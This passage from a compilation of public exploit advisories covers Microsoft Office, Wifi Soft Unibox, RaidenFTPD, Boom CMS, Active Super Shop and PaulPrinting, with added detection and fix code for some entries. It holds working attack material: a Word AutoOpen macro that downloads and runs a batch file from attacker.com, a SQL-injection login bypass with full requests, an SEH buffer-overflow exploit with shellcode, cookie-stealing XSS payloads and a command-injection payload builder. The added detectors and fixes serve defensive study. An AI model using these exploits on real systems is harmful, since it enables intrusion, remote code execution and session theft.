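def build_restore_payload(config_xml: str, cmd: str) -> str:
    """Rewrite the backup XML the way the module's exploit method does."""
    m = re.search(r"<filename>(?P<file>.*?)</filename>", config_xml)
    if not m:
        raise ValueError("no <filename> element in rrddata backup")
    injected = f"WAN_DHCP-quality.rrd';{encode_command(cmd)};"
    return config_xml.replace(" ", "${IFS}").replace(m.group("file"), injected)


def is_safe_rrd_filename(name: str) -> bool:
    """Allowlist a restore routine can apply before building any shell command."""
    return bool(RRD_NAME.fullmatch(name)) and ".." not in name


if __name__ == "__main__":
    print(build_restore_payload(SAMPLE_RRD_XML, "id > tmp.out"))
    for name in ("WAN_DHCP-quality.rrd", "WAN_DHCP-quality.rrd';id;", "../x.rrd"):
        print(name, is_safe_rrd_filename(name))
```

Any command that needs a path (`/bin/sh`, `/tmp/x`) fails the bad-char check, which is why the module pairs the injection with a netcat-style payload that takes no slashes; the fix on the server side is to never pass the element into a shell and to validate it against a pattern like the one above.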
  8. ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
     ## Author: nu11secur1ty
     ## Date: 07.18.2023
     ## Vendor: https://www.microsoft.com/
     ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
     ## Reference: https://portswigger.net/web-security/access-control
     ## CVE-2023-33148

     ## Description:
     The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app, which is a part of Microsoft Office 365, and can easily trick the victim into clicking on it, opening it and executing a very dangerous shell command in the background of the local PC. This execution happens without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC; it depends on the scenario.

     ## Status: HIGH Vulnerability

     [+]Exploit:

     - Exploit Server:

     ```vb
     Sub AutoOpen()
         Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus)
     End Sub
     ```

     ## Reproduce:
     [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)

     ## Proof and Exploit
     [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)

     ## Time spent: 00:35:00
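Whatever the document does to get the macro running, the behaviour it produces on the endpoint is fixed: an Office process spawns cmd.exe, whose command line names a download utility, a script file and a chained second command. The following is an added example, not from the advisory, of detection logic for exactly that shape, run over constructed process-creation events. The field names loosely follow Sysmon Event ID 1 (parent image, image, command line), which is an assumption of the demo; any EDR or audit source with those three fields works the same way.

```python
"""Added example (not from the advisory): flag Office-spawned shells that fetch
and run scripts. Events below are constructed; the field layout is assumed."""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b", re.I
)
SCRIPT_FILE = re.compile(r"\.(bat|cmd|ps1|vbs|js|hta)\b", re.I)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample: the macro's child process, a benign Office helper, a shell
# spawned by Explorer (out of scope), and an Office-spawned shell doing nothing much.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /S /c curl -s https://attacker.example/golemui.bat > salaries.bat && .\salaries.bat'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c curl -s https://intranet.example/update.bat > u.bat"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo hi"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Return the indicators an event trips; an empty list means nothing of note."""
    reasons = []
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return reasons  # only children of Office processes are in scope here
    if basename(ev.image) in SHELLS:
        reasons.append("office-spawned-shell")
        if DOWNLOADERS.search(ev.command_line):
            reasons.append("download-utility")
        if SCRIPT_FILE.search(ev.command_line):
            reasons.append("script-file-in-cmdline")
        if "&&" in ev.command_line or " | " in ev.command_line:
            reasons.append("chained-commands")
    return reasons


def triage(events) -> list:
    """Keep events with at least two indicators; a bare shell spawn is too noisy on its own."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 2:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(basename(ev.parent_image), "->", basename(ev.image), reasons)
```

The two-indicator threshold is a tuning choice: in most fleets an Office parent plus a downloader alone is already rare enough to page on, and the script-file and chaining indicators mainly raise confidence.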
  9. # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
     # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
     # Date: 07/2023
     # Exploit Author: Ansh Jain @sudoark
     # Author Contact : [email protected]
     # Vendor Homepage: https://www.wifi-soft.com/
     # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php
     # Version: Unibox Administration 3.0 & 3.1
     # Tested on: Microsoft Windows 11
     # CVE : CVE-2023-34635
     # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

     The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because the user input in the username field of the login page is not validated or sanitised and is sent directly to the backend server and database.

     ## How to Reproduce
     Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not.
     Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password.
     Step 3 : Fill in the captcha and hit login.

     After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc.

     ----------------------------------------------------------------------------------------------------
     ### Login Request
     ----------------------------------------------------------------------------------------------------
     Parameters: username, password, captcha, action
     ----------------------------------------------------------------------------------------------------

     ```http
     POST /index.php HTTP/2
     Host: 255.255.255.255.host.com
     Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 83
     Origin: https://255.255.255.255.host.com
     Referer: https://255.255.255.255.host.com/index.php
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers

     username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
     ```

     ----------------------------------------------------------------------------------------------------
     ### Login Response
     ----------------------------------------------------------------------------------------------------

     ```http
     HTTP/2 302 Found
     Server: nginx
     Date: Tue, 18 Jul 2023 13:32:14 GMT
     Content-Type: text/html; charset=UTF-8
     Location: ./dashboard/dashboard
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     ```

     ----------------------------------------------------------------------------------------------------
     ### Successful Logged-in Request
     ----------------------------------------------------------------------------------------------------

     ```http
     GET /dashboard/dashboard HTTP/2
     Host: 255.255.255.255.host.com
     Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: https://255.255.255.255.host.com/index.php
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers
     ```

     ----------------------------------------------------------------------------------------------------
     ### Successful Logged-in Response
     ----------------------------------------------------------------------------------------------------

     ```http
     HTTP/2 200 OK
     Server: nginx
     Date: Tue, 18 Jul 2023 13:32:43 GMT
     Content-Type: text/html; charset=UTF-8
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Cache_control: private

     <!DOCTYPE html>
     <html lang="en">
     html content
     </html>
     ```
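The payload works because `'or 1=1 limit 1-- -` closes the string around the username, makes the WHERE clause true for every row, keeps only the first one (the administrator in most installs) and comments out the password check. The following is an added example, not Unibox code: the post's payload run against a string-built login query and against a parameterised one. Unibox's real query and schema are not public, so the table and the vulnerable statement are constructed to reproduce the symptom; SQLite is used because it ships with Python, and its `--` comments and LIMIT behave the same way here as MySQL's. Passwords are stored in the clear only to keep the demo short.

```python
"""Added example (not Unibox code): the login-bypass payload against a
concatenated query and a parameterised one. Schema and data are constructed."""
import sqlite3

PAYLOAD = "'or 1=1 limit 1-- -"   # the username value from the post


def seed() -> sqlite3.Connection:
    """Constructed users table with the administrator as the first row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)", [
        ("admin", "correct-horse-battery", "administrator"),
        ("guest", "guest", "user"),
    ])
    return db


def login_vulnerable(db, username: str, password: str):
    """Concatenates user input into SQL: the pattern the post describes.

    With the payload the statement becomes
      ... WHERE username=''or 1=1 limit 1-- -' AND password='...'
    so the password clause is a comment and LIMIT 1 returns the first user.
    """
    sql = (f"SELECT username, role FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone()


def login_parameterised(db, username: str, password: str):
    """Bound parameters: the payload is compared as a literal string and matches nothing."""
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = seed()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "randompassword"))
    print("parameterised:", login_parameterised(db, PAYLOAD, "randompassword"))
    print("real login   :", login_parameterised(db, "admin", "correct-horse-battery"))
```

Input "sanitising" of the username, which the post mentions, is the weaker fix: bound parameters remove the possibility of the data being parsed as SQL at all, and the captcha in the request does nothing against a single crafted submission.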
  10. # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
      # Date: 18/07/2023
      # Exploit Author: Andre Nogueira
      # Vendor Homepage: https://www.raidenftpd.com/en/
      # Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
      # Version: RaidenFTPD 2.4.4005
      # Tested on: Microsoft Windows 10 Build 19045

      # 1.- Open RaidenFTPD
      # 2.- Click on 'Setup' -> 'Step by step setup wizard'
      # 3.- Run python code: exploit-raidenftpd.py
      # 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
      # 5.- Click 'next' -> 'next' -> 'ok'
      # 6.- Pop calc.exe

      ```python
      #!/usr/bin/env python3
      from struct import pack

      crash = 2000   # total length that overruns the 'Server name' buffer
      offset = 497   # bytes of junk before the SEH record is overwritten

      # msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode -b "\x00\x0d"
      shellcode = b"\x90" * 8   # short NOP sled in front of the decoder stub
      shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
      shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
      shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
      shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
      shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
      shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
      shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
      shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
      shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
      shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
      shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
      shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
      shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
      shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
      shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
      shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
      shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
      shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
      shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
      shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

      # jmp short +6: skips the two padding bytes and the 4-byte SEH address,
      # landing on the shellcode 8 bytes after the start of nSEH
      nSEH = b"\xeb\x06\x90\x90"
      SEH = pack("<L", 0x7c1e76ff)   # pop eax; pop esi; ret; => msvcp70.dll

      buffer = b"A" * offset
      buffer += nSEH
      buffer += SEH
      buffer += shellcode
      buffer += b"D" * (crash - len(buffer))

      print("[*] Creating the .txt file for our payload")
      with open("exploit-raiden.txt", 'wb') as file_payload:
          print("[*] Writing malicious payload to the .txt file")
          file_payload.write(buffer)
      ```
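The exploit above is built from four parts whose sizes must line up exactly: junk up to the nSEH offset, a short jump in nSEH that hops over the handler address, the pop/pop/ret address in little-endian form, and the shellcode. Two things are easy to get wrong and are worth checking mechanically: the relative distance in the `EB xx` jump, and the absence of the bad characters (0x00, 0x0d here) from the handler address and shellcode, which msfvenom encodes around but which the chosen gadget address may still contain. The following is an added example, not part of the RaidenFTPD exploit, that generalises the buffer construction and the checks; the offset, gadget address and bad chars are the ones from the post, and the "shellcode" is a constructed NOP sled plus INT3 rather than a real payload.

```python
"""Added example (not the RaidenFTPD exploit): assemble and sanity-check an SEH
overwrite buffer. Offset, gadget and bad chars come from the post; the shellcode
is a constructed placeholder."""
import struct

BAD_CHARS = b"\x00\x0d"  # from the msfvenom -b argument in the post


def short_jmp(distance: int) -> bytes:
    """Encode `jmp short rel8` (EB xx); rel8 is relative to the end of the 2-byte instruction."""
    if not -128 <= distance <= 127:
        raise ValueError("short jump distance must fit in a signed byte")
    return b"\xeb" + struct.pack("<b", distance)


def check_bad_chars(label: str, data: bytes, bad: bytes = BAD_CHARS) -> None:
    """Raise if any byte of `data` is in the bad-char set."""
    found = sorted({b for b in data if b in bad})
    if found:
        raise ValueError(f"{label} contains bad chars: {[hex(b) for b in found]}")


def build_seh_buffer(offset: int, handler_addr: int, shellcode: bytes,
                     total_len: int, bad: bytes = BAD_CHARS) -> bytes:
    """junk | nSEH (jmp short + 2 pad bytes) | SEH (pop/pop/ret, LE) | shellcode | filler."""
    seh = struct.pack("<L", handler_addr)
    check_bad_chars("SEH handler address", seh, bad)
    check_bad_chars("shellcode", shellcode, bad)
    # The jump sits at the start of nSEH; after its 2 bytes come 2 pad bytes and
    # the 4-byte handler, so the shellcode is 2 + len(seh) bytes past the jump's end.
    nseh = short_jmp(2 + len(seh)) + b"\x90\x90"
    buf = b"A" * offset + nseh + seh + shellcode
    if len(buf) > total_len:
        raise ValueError(f"payload needs {len(buf)} bytes but only {total_len} are available")
    return buf + b"D" * (total_len - len(buf))


def describe(buf: bytes, offset: int) -> dict:
    """Decode the SEH record back out of a built buffer for a quick eyeball check."""
    jmp_distance = struct.unpack("<b", buf[offset + 1:offset + 2])[0]
    handler = struct.unpack("<L", buf[offset + 4:offset + 8])[0]
    return {"jmp_distance": jmp_distance, "handler": hex(handler),
            "shellcode_starts_at": offset + 2 + jmp_distance}


if __name__ == "__main__":
    sled = b"\x90" * 8 + b"\xcc"  # constructed placeholder, not a real payload
    buf = build_seh_buffer(497, 0x7c1e76ff, sled, 2000)
    print(describe(buf, 497))
```

`describe` makes the arithmetic visible: with the jump at offset 497 and distance 6, the shellcode starts at 505, which is exactly where `build_seh_buffer` placed it.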
  11. # Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting

      References (Source):
      https://www.vulnerability-lab.com/get_content.php?id=2274

      Release Date:
      2023-07-03

      Vulnerability Laboratory ID (VL-ID):
      2274

      Product & Service Introduction:
      ===============================
      Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge.

      (Copy of the Homepage: https://www.boomcms.net/boom-boom )

      Abstract Advisory Information:
      ==============================
      The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.

      Affected Product(s):
      ====================
      UXB London
      Product: Boom v8.0.7 - Content Management System (Web-Application)

      Vulnerability Disclosure Timeline:
      ==================================
      2022-07-24: Researcher Notification & Coordination (Security Researcher)
      2022-07-25: Vendor Notification (Security Department)
      2023-**-**: Vendor Response/Feedback (Security Department)
      2023-**-**: Vendor Fix/Patch (Service Developer Team)
      2023-**-**: Security Acknowledgements (Security Department)
      2023-07-03: Public Disclosure (Vulnerability Laboratory)

      Discovery Status:
      =================
      Published

      Exploitation Technique:
      =======================
      Remote

      Severity Level:
      ===============
      Medium

      Authentication Type:
      ====================
      Restricted Authentication (User Privileges)

      User Interaction:
      =================
      Low User Interaction

      Disclosure Type:
      ================
      Responsible Disclosure

      Technical Details & Description:
      ================================
      A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

      The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add their own malformed albums with malicious script code in the title and description. After the injection the albums are displayed in the backend, where the execution takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is POST. The validation tries to parse the content by adding a backslash. This does not have any impact on injecting malicious JavaScript, because it is only performed for double and single quotes to prevent SQL injection.

      Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

      Request Method(s):
      [+] POST

      Vulnerable Module(s):
      [+] assets-manager (album)

      Vulnerable Function(s):
      [+] add

      Vulnerable Parameter(s):
      [+] title
      [+] description

      Affected Module(s):
      [+] Frontend (Albums)
      [+] Backend (Albums Assets)

      Proof of Concept (PoC):
      =======================
      The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

      Manual steps to reproduce the vulnerability ...
      1. Login to the application as restricted user
      2. Create a new album
      3. Inject a test script code payload to title and description
      4. Save the request
      5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
      6. Successful reproduce of the persistent cross site web vulnerability!

      Payload(s):
      ><script>alert(document.cookie)</script><div style=1
      <a onmouseover=alert(document.cookie)>test</a>

      --- PoC Session Logs (Inject) ---
      https://localhost:8000/boomcms/album/35
      Host: localhost:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
      Accept: application/json, text/javascript, */*; q=0.01
      Content-Type: application/json
      X-Requested-With: XMLHttpRequest
      Content-Length: 263
      Origin: https://localhost:8000
      Connection: keep-alive
      Referer: https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
      Sec-Fetch-Site: same-origin
      {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
      "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
      -
      PUT: HTTP/1.1 200 OK
      Server: Apache
      Cache-Control: no-cache, private
      Set-Cookie: Max-Age=7200; path=/
      Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly
      Content-Length: 242
      Connection: Keep-Alive
      Content-Type: application/json
      -
      https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
      Host: localhost:8000
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: de,en-US;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate, br
      Connection: keep-alive
      Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
      -
      GET: HTTP/1.1 200 OK
      Server: Apache
      Cache-Control: no-cache, private
      Set-Cookie:
      Vary: Accept-Encoding
      Content-Length: 7866
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
      -

      Vulnerable Source: asset-manager/albums/[ID]

      ```html
      <li data-album="36">
      <a href="#albums/20">
      <div>
      <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
      <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
      <p class='count'><span>0</span> assets</p>
      </div>
      </a>
      </li>
      </iframe></p></div></a></li></ul></div></div>
      </div>
      <div id="b-assets-view-asset-container"></div>
      <div id="b-assets-view-selection-container"></div>
      <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
      <div class="heading">
      <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
      <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
      </div>
      ```

      Solution - Fix & Patch:
      =======================
      The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.

      Security Risk:
      ==============
      The security risk of the persistent input validation web vulnerability in the application is estimated as medium.

      Credits & Authors:
      ==================
      Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
12. # Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:
2023-07-04

Vulnerability Laboratory ID (VL-ID):
2278

Common Vulnerability Scoring System:
5.4

Product & Service Introduction:
===============================
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):
====================
ActiveITzone
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple html injection web vulnerabilities have been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing.
There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges).
Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application.
The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Details

Vulnerable Parameter(s):
[+] name
[+] phone
[+] address

Affected Module(s):
[+] manage profile
[+] products branding

Proof of Concept (PoC):
=======================
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">
<div class="panel-heading">
<h3 class="panel-title">Manage Details</h3>
</div>
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8">
<div class="panel-body">
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>
<div class="col-sm-6">
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>
<div class="col-sm-6">
<input type="email" name="email" value="[email protected]" id="demo-hor-2" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label>
<div class="col-sm-6">
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">
</div></div>

--- PoC Session Logs (POST) ---
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680
Content-Length: 902
Origin: https://assm_cms.localhost:8080
Connection: keep-alive
Referer: https://assm_cms.localhost:8080/shop/admin/manage_admin/
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
https://assm_cms.localhost:8080/shop/admin/manage_admin/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Reference(s):
https://assm_cms.localhost:8080/shop/
https://assm_cms.localhost:8080/shop/admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:
=======================
Disallow insertion of html code for input fields like name, address and phone. Sanitize the content for secure delivery.

Security Risk:
==============
The security risk of the html injection web vulnerabilities in the shopping web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
13. Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:
=============
2023-07-17

Vulnerability Laboratory ID (VL-ID):
====================================
2286

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
